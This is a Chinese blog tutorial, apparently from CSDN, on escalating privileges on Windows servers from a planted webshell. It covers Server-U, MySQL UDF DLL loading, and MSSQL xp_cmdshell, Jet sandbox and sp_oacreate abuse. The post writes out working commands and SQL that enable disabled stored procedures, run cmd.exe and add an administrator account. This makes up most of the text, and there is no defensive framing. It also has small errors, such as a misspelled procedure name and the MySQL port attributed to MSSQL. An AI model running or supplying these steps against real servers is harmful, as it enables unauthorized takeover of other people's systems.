基于webshell提权

1.Server-u提权
Server-u是windows平台的FTP服务器软件,通过使用server-u,用户能够将任何一台PC设置成一个FTP服务器,这样,用户就能够使用FTP协议进行文件或目录的复制,创建和删除等。
通过webshell读取server-u配置文件,修改配置,添加系统用户(组)
利用webshell读取服务器信息,发现服务器安装server-u服务
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击执行--CMD,在右侧选上复选框"wscript.shell", 输入netstat -an查看端口
3,利用webshell读取服务器信息,发现服务器系统安装server-u服务,默认端口号43958
4.单击Servu-提权,在命令行中输入:cmd /c net user aaa 123 /add & net localgroup administrators aaa /add
利用远程桌面连接server-u服务器, 输入mstsc
1.单击开始-运行-输入cmd, 在命令行中输入"mstsc"
2.输入新添加的账号aaa, 输入密码123,单击确定
2.Mysql_udf提权
UDF(user-defined function)是MySQL的一个扩展接口,也称为自定义函数
通过webshell读取网站数据库配置文件,获取数据库连接用户名和密码
利用webshell读取服务器信息,发现服务器系统安装mssql数据库,默认端口3306
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击端口扫描-开始扫描,发现3306端口开放,安装了MySQL数据库
3.单击mysql_udf提权,输入已知的数据库连接用户名和密码,单击连接
4.在可加载路径中输入:C:/windows/mysqlDll.dll, 单击安装DLL
5.在下拉列表中选择添加管理员,输入net user aaa 123 /add, 单击执行
6.在下拉列表中选择设为管理组,输入net localgroup administrators aaa /add, 单击执行 
3.MSsql xp_cmdshell提权
通过webshell取得网站数据库连接配置文件,获取数据库连接密码。通过webshell上用xp_cmdshell添加系统账号
利用webshell读取服务器信息,发现服务器系统安装mssql2005数据库,默认端口1433
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击端口扫描-开始扫描,发现1433端口开放,安装了MSSQL数据库
3.单击数据库操作,输入数据库名称master和密码,链接MSSql数据库
4.输入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 查看cmd_shell是否开启
5.添加系统账号,执行SQL操作命令:exec master.dbo.xp_cndshell 'net user aaa 123 /add'
6.将账号加入管理员组,执行SQL操作命令:Exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
xp_cmdshell存储过程在MSsql2005及以上版本默认是禁用的,输入SQL操作命令激活xp_cmdshell
"exec sp_configure show advanced options,1; reconfigure; exec sp_configure xp_cmdshell, 1; reconfigure;"
4.MSsql SandBox沙盒提权
通过webshell取得网站数据库连接配置文件,获取数据库连接密码。利用沙盒获取系统权限
利用webshell读取服务器信息,发现服务器系统安装mssql2005数据库
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击端口扫描-开始扫描,发现1433端口开放,安装了MSSQL数据库
3.单击数据库操作,输入数据库名称master和密码,链接MSSql数据库。在sql操作命令中输入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 查看cmd_shell是否开启
4.利用jet.oledb执行系统命令添加系统账号
在SQL操作命令输入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user aaa 123 /add")')"  
在SQL操作命令输入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators aaa /add")')"  //将用户填入管理员组
xp_regwrite存储过程在Mssql 2005及以上版本默认是禁用的,输入SQL操作命令激活xp_regwrite
"exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--"
5.MSsql sp_oacreate提权
通过webshell取得网站数据库连接配置文件,获取数据库连接密码。利用sp_oacreate添加系统账号
利用webshell读取服务器信息,发现服务器系统安装mssql2005数据库
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击端口扫描-开始扫描,发现1433端口开放,安装了MSSQL数据库
3.单击数据库操作,输入数据库名称master和密码,链接MSSql数据库。在sql操作命令中输入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 查看cmd_shell是否开启
4.利用sp_oacreate添加系统账号,并将账号加入管理员组
在SQL操作命令中输入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aaa 123 /add' "
在SQL操作命令中输入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aaa /add' "
declare @shell int //判断支持多行语句查询
3.sp_oacreate存储过程在Mssql 2005及以上版本默认是禁用的,输入SQL操作命令激活sp_oacreate
"exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;"
6.Mssql自动化任务提权
利用webshell读取服务器信息,发现服务器系统安装mssql2005数据库
1.在浏览器中输入http://目标地址/webshell.asp,输入默认密码
2.单击端口扫描-开始扫描,发现1433端口开放,安装了MSSQL数据库
双击1433提权器软件,输入IP地址,密码等连接数据库
在命令中输入:net user aaa 123 /add  //添加用户
在命令中输入:net localgroup administrators aaa /add  //给用户赋予管理员权限
在命令中输入:netstat -an 查看服务器开发的端口
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值